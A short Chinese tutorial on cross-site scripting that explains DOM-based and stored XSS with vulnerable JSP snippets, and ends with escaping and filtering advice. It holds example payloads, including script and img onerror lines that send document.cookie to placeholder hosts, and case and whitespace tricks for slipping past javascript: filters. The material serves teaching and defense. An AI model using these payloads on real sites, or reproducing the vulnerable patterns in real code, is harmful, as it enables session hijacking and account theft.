XSS 攻击，即跨站脚本攻击（Cross Site Scripting），它是 web 程序中常见的漏洞。 

原理

攻击者往 web 页面里插入恶意的 HTML 代码（Javascript、css、html 标签等），当用户浏览该页面时，嵌入其中的 HTML 代码会被执行，从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作，破坏页面结构、重定向到其他网站等。 

种类

1、DOM Based XSS：基于网页 DOM 结构的攻击

例如：

• input 标签 value 属性赋值

//jsp
<input type="text" value="<%= getParameter("content") %>">

访问

http://xxx.xxx.xxx/search?content=<script>alert('XSS');</script>    //弹出 XSS 字样
http://xxx.xxx.xxx/search?content=<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>    //把当前页面的 cookie 发送到 xxxx.aaa.xxx 网站

• 利用 a 标签的 href 属性的赋值

//jsp
<a href="escape(<%= getParameter("newUrl") %>)">跳转...</a>

访问

http://xxx.xxx.xxx?newUrl=javascript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
变换大小写
http://xxx.xxx.xxx?newUrl=JAvaScript:alert('XSS')    //点击 a 标签就会弹出 XSS 字样
加空格
http://xxx.xxx.xxx?newUrl= JavaScript :alert('XSS')    //点击 a 标签就会弹出 XSS 字样

• image 标签 src 属性，onload、onerror、onclick 事件中注入恶意代码

<img src='xxx.xxx' onerror='javascript:window.open("http://aaa.xxx?param="+document.cookie)' />

2、Stored XSS：存储式XSS漏洞

<form action="save.do">
	<input name="content" value="">
</form>

输入 <script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>，提交
当别人访问到这个页面时，就会把页面的 cookie 提交到 xxx.aaa.xxx，攻击者就可以获取到 cookie

预防思路 

• web 页面中可由用户输入的地方，如果对输入的数据转义、过滤处理
• 后台输出页面的时候，也需要对输出内容进行转义、过滤处理（因为攻击者可能通过其他方式把恶意脚本写入数据库）
• 前端对 html 标签属性、css 属性赋值的地方进行校验

注意：

各种语言都可以找到 escapeHTML() 方法可以转义 html 字符。

<script>window.open("xxx.aaa.xxx?param="+document.cookie)</script>
转义后
%3Cscript%3Ewindow.open%28%22xxx.aaa.xxx%3Fparam%3D%22+document.cookie%29%3C/script%3E

需要考虑项目中的一些要求，比如转义会加大存储。可以考虑自定义函数，部分字符转义。

详细可以参考：

1、 XSS攻击及防御

2、前端安全系列（一）：如何防止XSS攻击？

3、浅谈XSS攻击的那些事（附常用绕过姿势）